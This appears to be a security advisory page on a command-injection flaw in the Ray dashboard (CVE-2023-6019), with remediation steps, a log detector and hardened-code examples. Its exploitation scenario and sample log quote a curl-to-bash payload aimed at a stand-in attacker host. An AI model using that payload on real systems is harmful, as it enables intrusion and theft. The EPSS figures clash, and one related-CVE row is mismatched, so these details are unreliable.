CVE-2023-6019: Ray: unauthenticated RCE via dashboard command injection
GHSA-h3xg-wv58-5p43 | CRITICAL | PoC AVAILABLE

An unauthenticated attacker with network access to the Ray dashboard (port 8265) can execute arbitrary OS commands on your ML cluster head node with zero prerequisites. With an EPSS of 0.887, this is near-certain to be exploited in the wild. Patch to Ray 2.8.1 immediately or firewall the dashboard. Any Ray cluster reachable from untrusted networks is fully compromised until remediated.
What is the risk?
Severity is maximum for any organization running Ray. CVSS 9.8 combined with EPSS 0.887 places this in the top tier of exploitability — no authentication, no user interaction, network-accessible attack vector. Ray head nodes typically hold GPU credentials, cloud IAM tokens, training data access, and model artifacts, making post-exploitation blast radius extremely high. Exposure risk is elevated because ML engineers routinely expose Ray dashboards on internal networks or even public cloud IPs without additional auth layers.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Ray | pip | < 2.8.1 | 2.8.1 |
If you run a Ray version earlier than 2.8.1, you are affected.
What should I do?
1. PATCH: Upgrade Ray to >= 2.8.1 immediately (`pip install 'ray>=2.8.1'`).
2. NETWORK: If patching is not immediately possible, block all external access to Ray dashboard (default port 8265) and GCS server (port 6379) via firewall or security group rules; restrict to trusted internal CIDR only.
3. AUTH PROXY: Place Ray dashboard behind an authenticating reverse proxy (e.g., OAuth2 Proxy, Nginx + htpasswd) as a defense-in-depth measure even post-patch.
4. DETECT: Monitor for anomalous process spawning from the Ray dashboard process (PID tree analysis), unusual outbound connections from Ray head nodes, and unexpected credential access in cloud provider audit logs.
5. AUDIT: Review cloud IAM roles attached to Ray head node instances and apply least privilege; assume credentials were compromised if running vulnerable versions in any networked environment.
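A request-log complement to the DETECT step, as an added example (not part of the original advisory or of Ray's code): it flags `/cpu_profile` requests whose decoded query parameters contain shell metacharacters. It assumes a reverse proxy in front of port 8265 writing Common Log Format; the log lines are constructed and reuse the payload quoted on this page.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# After URL-decoding, any of these in a parameter value can end or extend a shell word.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\r\n]")
# Assumed proxy log format (Common Log Format): src ... "METHOD target HTTP/x.y" ...
REQUEST = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return (name, decoded value) pairs of a cpu_profile request that hold shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith("/cpu_profile"):
        return []
    hits = []
    # Split on the raw '&' first so an encoded %26 inside a value is still caught.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if SHELL_META.search(value):
            hits.append((name, value))
    return hits

def scan(log_text):
    """Return one finding per flagged parameter: source address, parameter name, decoded value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m:
            for name, value in suspicious_params(m["target"]):
                findings.append({"src": m["src"], "param": name, "value": value})
    return findings

# Constructed sample lines; the flagged query strings reuse the payload quoted on this page.
SAMPLE_LOG = """\
10.0.4.17 - - [12/Dec/2023:09:14:02 +0000] "GET / HTTP/1.1" 200 512
10.0.4.17 - - [12/Dec/2023:09:14:05 +0000] "GET /cpu_profile?ip=10.0.4.21 HTTP/1.1" 200 9031
203.0.113.50 - - [12/Dec/2023:09:20:41 +0000] "GET /cpu_profile?ip=127.0.0.1;curl+attacker.com/shell.sh|bash HTTP/1.1" 200 0
203.0.113.50 - - [12/Dec/2023:09:20:44 +0000] "GET /cpu_profile?ip=127.0.0.1%3Bcurl+attacker.com%2Fshell.sh%7Cbash HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['src']} {f['param']}={f['value']!r}")
```

A hit on a host that ran a vulnerable version is a reason to start the AUDIT step for that head node, not just to block the source address.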
Frequently Asked Questions
Is CVE-2023-6019 actively exploited?
A weaponized Metasploit module (exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) exists for CVE-2023-6019, meaning the exploit is point-and-click and the risk of opportunistic exploitation is high.
What systems are affected by CVE-2023-6019?
This vulnerability affects the following AI/ML architecture patterns: distributed training pipelines, model serving, MLOps platforms, hyperparameter optimization pipelines, AI/ML compute clusters.
What is the CVSS score for CVE-2023-6019?
CVE-2023-6019 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 74.63%.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0006 Active Scanning
- AML.T0025 Exfiltration via Cyber Means
- AML.T0049 Exploit Public-Facing Application
- AML.T0050 Command and Scripting Interpreter
- AML.T0055 Unsecured Credentials
- AML.T0072 Reverse Shell
What are the technical details?
Original Advisory
A command injection exists in Ray's cpu_profile URL parameter allowing attackers to execute OS commands on the system running the Ray dashboard remotely without authentication.
Exploitation Scenario
Attacker scans for exposed Ray dashboards on port 8265 (trivially discoverable via Shodan or internal network scan). Sends a crafted GET request to the `/cpu_profile` endpoint with a command injection payload in the `ip` parameter — e.g., `GET /cpu_profile?ip=127.0.0.1;curl+attacker.com/shell.sh|bash`. No authentication token, API key, or session cookie required. The dashboard executes the OS command in the context of the Ray process (often running as root or a privileged service account). Attacker establishes a reverse shell on the head node, extracts cloud credentials from instance metadata (AWS IMDSv1, GCP metadata endpoint), pivots to all Ray worker nodes, exfiltrates model weights and training datasets, and optionally injects poisoned code into the training pipeline for persistent access or model integrity compromise.
Weaknesses (CWE)
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
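The CWE-78 pattern described above next to two fixes, as an added illustration (hypothetical handler code, not Ray's source and not the patch shipped in 2.8.1): a shell string built from the `ip` parameter, the same call as an argument vector with no shell, and a version that first validates the value as an IP address. `echo` stands in for the external profiler binary and the payload is a constructed, harmless one.

```python
import ipaddress
import subprocess

TOOL = "echo"  # harmless placeholder for the external profiler binary (assumption)

def profile_vulnerable(ip):
    """CWE-78 pattern: request text is spliced into a string that /bin/sh parses."""
    return subprocess.run(f"{TOOL} profiling {ip}", shell=True,
                          capture_output=True, text=True).stdout

def profile_argv(ip):
    """No shell: the value is one argv element, so ';' and '|' are plain data."""
    return subprocess.run([TOOL, "profiling", ip],
                          capture_output=True, text=True, check=True).stdout

def profile_hardened(ip):
    """Allow-list by type first, then run the argv form with the normalised value."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        raise ValueError(f"rejected ip parameter: {ip!r}") from None
    return profile_argv(str(addr))

# Constructed, harmless stand-in for an injected value.
PAYLOAD = "127.0.0.1; echo INJECTED"

if __name__ == "__main__":
    print(repr(profile_vulnerable(PAYLOAD)))   # second command runs
    print(repr(profile_argv(PAYLOAD)))         # payload echoed back as text
    try:
        profile_hardened(PAYLOAD)
    except ValueError as exc:
        print(exc)                             # rejected before any process starts
```

Dropping the shell alone still leaves argument injection (a value beginning with `-`), which is why the type check stays in front of the argv call.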
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References
- github.com/advisories/GHSA-h3xg-wv58-5p43
- github.com/ray-project/ray/releases/tag/ray-2.8.1
- huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
- nvd.nist.gov/vuln/detail/CVE-2023-6019
- anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
- github.com/20142995/nuclei-templates Exploit
- github.com/Clydeston/CVE-2023-6019 Exploit
- github.com/EssenceCyber/Exploit-List Exploit
- github.com/FireWolfWang/CVE-2023-6019 Exploit
- github.com/google/tsunami-security-scanner-plugins Exploit
- github.com/kikihayashi/Offsec_Proving_Grounds Exploit
- github.com/kikihayashi/Offsec_Proving_Grounds_test Exploit
- github.com/miguelc49/CVE-2023-6019-1 Exploit
- github.com/miguelc49/CVE-2023-6019-2 Exploit
- github.com/miguelc49/CVE-2023-6019-3 Exploit
- github.com/nomi-sec/PoC-in-GitHub Exploit
- github.com/pika5164/Offsec_Proving_Grounds Exploit
Related Vulnerabilities
| CVE | Score | Title | Relation |
|---|---|---|---|
| CVE-2023-48022 | 9.8 | Ray: unauthenticated RCE via job submission API | Same package: ray |
| CVE-2023-6020 | 9.3 | Ray: unauthenticated LFI exposes entire filesystem | Same package: ray |
| CVE-2023-6021 | 9.3 | Ray: LFI allows unauthenticated file read | Same package: ray |
| CVE-2026-32981 | 7.5 | Ray Dashboard: unauthenticated path traversal file read | Same package: ray |
| CVE-2026-54683 | 6.5 | nl-portal documenten-api: IDOR exposes citizen documents | Same package: ray |